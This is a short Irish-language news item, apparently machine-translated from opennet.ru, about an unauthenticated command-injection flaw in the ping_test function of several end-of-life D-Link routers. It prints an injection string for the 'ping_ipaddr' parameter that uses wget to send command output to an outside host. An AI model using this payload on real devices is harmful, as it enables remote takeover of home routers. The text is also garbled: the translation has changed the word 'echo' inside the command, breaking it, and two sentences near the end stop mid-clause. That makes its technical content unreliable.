I ródairí gan sreang D-Link
Suimiúil go leor, de réir na bhforbróirí firmware, níor cheart an glao “ping_test” a fhorghníomhú ach amháin tar éis fíordheimhnithe, ach i ndáiríre tugtar é ar aon nós, beag beann ar logáil isteach sa chomhéadan gréasáin. Go háirithe, nuair a bhíonn tú ag rochtain ar an script app_sec.cgi agus ag dul thar an bparaiméadar “action=ping_test”, atreoraíonn an script chuig an leathanach fíordheimhnithe, ach déanann sé an gníomh a bhaineann le ping_test ag an am céanna. Chun an cód a fhorghníomhú, baineadh úsáid as leochaileacht eile i ping_test féin, a ghlaonn an áirgiúlacht ping gan seiceáil i gceart ar cheart an seoladh IP a seoladh le haghaidh tástála. Mar shampla, chun an fóntais wget a ghlaoch agus torthaí an ordaithe “macalla 1234” a aistriú chuig óstach seachtrach, ní gá ach an paraiméadar a shonrú “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( macalla 1234)".
Deimhníodh láithreacht na leochaileachta go hoifigiúil sna samhlacha seo a leanas:
- DIR-655 le firmware 3.02b05 nó níos sine;
- DIR-866L le firmware 1.03b04 nó níos sine;
- DIR-1565 le firmware 1.01 nó níos sine;
- DIR-652 (níl aon fhaisnéis faoi leaganacha firmware fadhbacha ar fáil)
Tá an tréimhse tacaíochta do na samhlacha seo imithe in éag cheana féin, mar sin D-Link
Fuarthas amach ina dhiaidh sin go raibh an leochaileacht freisin
Foinse: oscailtenet.ru